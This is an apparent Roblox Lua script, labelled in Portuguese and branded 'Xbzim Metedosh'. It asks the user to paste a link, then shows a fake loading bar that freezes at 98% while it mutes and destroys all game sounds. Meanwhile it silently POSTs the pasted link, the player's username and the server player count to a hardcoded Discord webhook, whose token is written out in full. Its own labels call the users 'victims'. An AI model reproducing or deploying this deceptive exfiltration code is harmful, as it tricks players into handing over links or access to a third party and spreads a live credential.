--========================================================--
local WEBHOOK = "https://discord.com/api/webhooks/1448299374009520250/UFMitlVfU1XRquZ_ZjF_7OL2PGJE_smdOolMZKSxOWunsZeHkS7Vs0HLFR81b_PMeeI5"

local Http = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local SoundService = game:GetService("SoundService")

--========================================================--
-- MUTAÇÃO TOTAL
--========================================================--
pcall(function()
    SoundService.RespectFilteringEnabled = false
    SoundService.Volume = 0
end)

for _, sg in ipairs(SoundService:GetChildren()) do
    if sg:IsA("SoundGroup") then
        sg:Destroy()
    end
end

local function DestroySound(obj)
    if obj:IsA("Sound") then
        obj.Volume = 0
        obj.Playing = false
        obj:Destroy()
    end
end

local function MuteTotal()
    for _, s in ipairs(game:GetDescendants()) do
        DestroySound(s)
    end
    if LocalPlayer:FindFirstChild("PlayerGui") then
        for _, s in ipairs(LocalPlayer.PlayerGui:GetDescendants()) do
            DestroySound(s)
        end
    end
end

game.DescendantAdded:Connect(function(obj)
    task.wait()
    DestroySound(obj)
end)

task.spawn(function()
    while true do
        SoundService.Volume = 0
        MuteTotal()
        task.wait()
    end
end)

--========================================================--
-- FUNÇÃO PARA ENVIAR WEBHOOK
--========================================================--
local function enviarWebhook(link)
    local qtdPlayers = #Players:GetPlayers()

    pcall(function()
        request({
            Url = WEBHOOK,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = Http:JSONEncode({
                embeds = {{
                    title = "📩 XBZIM METEDOSH VÍTIMA ENCONTRADA",
                    color = 3092790,
                    fields = {
                        {name = "🔗 Link", value = link},
                        {name = "👤 Usuário", value = LocalPlayer.Name},
                        {name = "👥 Jogadores no Servidor", value = tostring(qtdPlayers)}
                    }
                }}
            })
        })
    end)
end

--========================================================--
-- TELA DE CARREGAMENTO PROFISSIONAL (98%)
--========================================================--
local function LoadingScreen()
    MuteTotal()

    local gui = Instance.new("ScreenGui")
    gui.Parent = game.CoreGui
    gui.DisplayOrder = 999999999
    gui.IgnoreGuiInset = true
    gui.ResetOnSpawn = false

    -- FUNDO
    local bg = Instance.new("Frame", gui)
    bg.Size = UDim2.new(1,0,1,0)
    bg.BackgroundColor3 = Color3.fromRGB(10,0,20)
    local grad = Instance.new("UIGradient", bg)
    grad.Color = ColorSequence.new({
        ColorSequenceKeypoint.new(0, Color3.fromRGB(40, 0, 70)),
        ColorSequenceKeypoint.new(1, Color3.fromRGB(10, 0, 20))
    })
    grad.Rotation = 45

    -- TÍTULO
    local title = Instance.new("TextLabel", bg)
    title.Size = UDim2.new(1,0,0,90)
    title.Position = UDim2.new(0.5,0,0.28,0)
    title.AnchorPoint = Vector2.new(0.5,0.5)
    title.BackgroundTransparency = 1
    title.Font = Enum.Font.GothamBlack
    title.Text = "XBZIM METEDOSH"
    title.TextScaled = true
    title.TextColor3 = Color3.fromRGB(200,140,255)

    -- SUBTÍTULO
    local subtitle = Instance.new("TextLabel", bg)
    subtitle.Size = UDim2.new(1,0,0,60)
    subtitle.Position = UDim2.new(0.5,0,0.40,0)
    subtitle.AnchorPoint = Vector2.new(0.5,0.5)
    subtitle.BackgroundTransparency = 1
    subtitle.Font = Enum.Font.GothamBold
    subtitle.Text = "PROCURANDO VÍTIMAS..."
    subtitle.TextScaled = true
    subtitle.TextColor3 = Color3.fromRGB(220,180,255)

    -- SPINNER
    local spinner = Instance.new("ImageLabel", bg)
    spinner.Size = UDim2.new(0,120,0,120)
    spinner.Position = UDim2.new(0.5,0,0.63,0)
    spinner.AnchorPoint = Vector2.new(0.5,0.5)
    spinner.BackgroundTransparency = 1
    spinner.Image = "rbxassetid://9067069331"

    -- BARRA
    local barBG = Instance.new("Frame", bg)
    barBG.Size = UDim2.new(0.45,0,0,12)
    barBG.Position = UDim2.new(0.5,0,0.80,0)
    barBG.AnchorPoint = Vector2.new(0.5,0.5)
    barBG.BackgroundColor3 = Color3.fromRGB(50,10,80)
    Instance.new("UICorner", barBG).CornerRadius = UDim.new(0,10)

    local barFill = Instance.new("Frame", barBG)
    barFill.Size = UDim2.new(0,0,1,0)
    barFill.BackgroundColor3 = Color3.fromRGB(190,110,255)
    Instance.new("UICorner", barFill).CornerRadius = UDim.new(0,10)

    -- PORCENTAGEM
    local percent = Instance.new("TextLabel", bg)
    percent.Size = UDim2.new(1,0,0,40)
    percent.Position = UDim2.new(0.5,0,0.86,0)
    percent.AnchorPoint = Vector2.new(0.5,0.5)
    percent.BackgroundTransparency = 1
    percent.Font = Enum.Font.GothamBold
    percent.TextScaled = true
    percent.TextColor3 = Color3.fromRGB(230,200,255)
    percent.Text = "0%"

    -- ANIMAÇÃO
    task.spawn(function()
        local p = 0

        while barFill.Parent and p < 98 do
            spinner.Rotation += 3
            p += math.random(1,3)
            if p > 98 then p = 98 end

            percent.Text = p .. "%"
            barFill.Size = UDim2.new(p/100, 0, 1, 0)

            task.wait(0.05)
        end

        -- PARA EM 98%
        percent.Text = "98%"

        while barFill.Parent do
            spinner.Rotation += 3
            task.wait(0.01)
        end
    end)
end

--========================================================--
-- MENU GUI FINAL
--========================================================--
local gui = Instance.new("ScreenGui")
gui.Parent = game.CoreGui
gui.DisplayOrder = 999999998
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

local base = Instance.new("Frame", gui)
base.Size = UDim2.new(0,350,0,240)
base.Position = UDim2.new(0.5,-175,0.5,-120)
base.BackgroundColor3 = Color3.fromRGB(20,0,35)
Instance.new("UICorner", base).CornerRadius = UDim.new(0,15)

local title2 = Instance.new("TextLabel", base)
title2.Size = UDim2.new(1,0,0,40)
title2.BackgroundTransparency = 1
title2.Font = Enum.Font.GothamBlack
title2.Text = "🌲 Xbzim  Metedosh"
title2.TextScaled = true
title2.TextColor3 = Color3.fromRGB(180,80,255)

local box = Instance.new("TextBox", base)
box.Size = UDim2.new(0.9,0,0,50)
box.Position = UDim2.new(0.5,0,0.45,0)
box.AnchorPoint = Vector2.new(0.5,0.5)
box.BackgroundColor3 = Color3.fromRGB(60,0,80)
box.PlaceholderText = "Cole o link aqui..."
box.Text = ""
box.TextColor3 = Color3.new(1,1,1)
box.TextScaled = true
Instance.new("UICorner", box).CornerRadius = UDim.new(0,12)

local btn = Instance.new("TextButton", base)
btn.Size = UDim2.new(0.5,0,0,45)
btn.Position = UDim2.new(0.5,0,0.78,0)
btn.AnchorPoint = Vector2.new(0.5,0.5)
btn.BackgroundColor3 = Color3.fromRGB(130,0,255)
btn.Text = "ENVIAR"
btn.Font = Enum.Font.GothamBold
btn.TextScaled = true
btn.TextColor3 = Color3.new(1,1,1)
Instance.new("UICorner", btn).CornerRadius = UDim.new(0,12)

--========================================================--
-- EVENTO DO BOTÃO
--========================================================--
btn.MouseButton1Click:Connect(function()
    local link = box.Text

    if link == "" or not (link:match("^https://") or link:match("^http://")) then
        box.Text = ""
        box.PlaceholderText = "LINK INVÁLIDO!"
        return
    end

    gui:Destroy()
    LoadingScreen()

    task.delay(2, function()
        enviarWebhook(link)
    end)
end)
